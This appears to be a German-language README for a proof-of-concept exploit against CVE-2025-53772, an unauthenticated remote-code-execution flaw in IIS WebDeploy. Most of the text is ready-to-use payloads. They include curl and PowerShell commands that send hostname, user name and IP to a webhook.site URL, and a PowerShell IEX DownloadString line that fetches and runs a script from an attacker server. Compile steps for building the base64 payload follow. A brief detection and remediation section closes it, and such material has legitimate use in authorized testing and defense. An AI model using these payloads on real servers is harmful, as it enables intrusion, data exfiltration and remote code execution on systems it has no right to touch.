
Proof-of-concept-Exploit für CVE-2025-53772, eine Remote-Codeausführung-Schwachstelle in IIS WebDeploy durch unsichere Deserialisierung. Beinhaltet anpassbare Payload-Generierung für Informationssammlung, Befehlsausführung und Reverse Shells.
Dieses Repository enthält einen Proof-of-Concept (PoC)-Exploit für CVE-2025-53772, eine Remote-Code-Ausführung-Schwachstelle in IIS WebDeploy durch unsicheres Deserialisieren.
Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diese Software verursacht werden. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie ausdrücklich eine Testberechtigung haben.
Bearbeiten Sie den Payload in poc.cs (Zeilen 18‑19), um Ihre Zielaktion festzulegen: csharp// Ersetzen Sie durch Ihre Webhook-URL und gewünschten Payload
set.Add("cmd.exe");
set.Add("/c curl -X POST https://webhook.site/IHR-WEBHOOK-ID -H \"Content-Type: application/json\" -d \"{\\\"hostname\\\":\\\"%COMPUTERNAME%\\\",\\\"user\\\":\\\"%USERNAME%\\\",\\\"ip\\\":\\\"$(curl -s ifconfig.me)\\\",\\\"exploit\\\":\\\"CVE-2025-53772\\\",\\\"timestamp\\\":\\\"%DATE% %TIME%\\\"}\"");
Informationssammlung (empfohlen):
csharpset.Add("powershell.exe");
set.Add("-Command \"$hostname=$env:COMPUTERNAME; $user=$env:USERNAME; $ip=(Invoke-RestMethod -Uri 'https://ipinfo.io/ip' -UseBasicParsing); $body=@{hostname=$hostname;user=$user;ip=$ip;exploit='CVE-2025-53772';timestamp=(Get-Date)} | ConvertTo-Json; Invoke-RestMethod -Uri 'https://webhook.site/IHR-WEBHOOK-ID' -Method Post -Body $body -ContentType 'application/json'\"");
Einfache Befehlsausführung:
csharpset.Add("cmd.exe");
set.Add("/c calc.exe"); // Öffnet Taschenrechner
Reverse Shell (Fortgeschritten):
csharpset.Add("powershell.exe");
set.Add("-Command \"IEX (New-Object Net.WebClient).DownloadString('http://IHR-SERVER/shell.ps1')\"");
Die GitHub-Aktion kompiliert automatisch den PoC und erstellt den Base64-codierten Payload:


Betroffene Software: IIS WebDeploy (mehrere Versionen) Schwachstellentyp: Unsicheres Deserialisieren, das zu RCE führt Angriffsvektor: Remote, ohne Authentifizierung Schweregrad: Kritisch
Wenn Sie lokal statt mit GitHub-Aktionen kompilieren möchten: bash# Windows mit .NET Framework C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe poc.cs poc.exe > payload.txt
csc poc.cs poc.exe 📡 Einrichten eines Webhooks
Erkennung:
Überwachen Sie auf ungewöhnliche BinaryFormatter-Deserialisierungsaktivitäten Achten Sie auf verdächtige Prozessausführungen durch IIS-Arbeiterprozesse Netzwerküberwachung auf unerwartete ausgehende Verbindungen
Abhilfe:
Aktualisieren Sie IIS WebDeploy auf die neueste Patch-Version Implementieren Sie Eingabevalidierung und -bereinigung Verwenden Sie Zulassungslisten für Deserialisierungstypen Setzen Sie Netzwerksegmentierung und -überwachung ein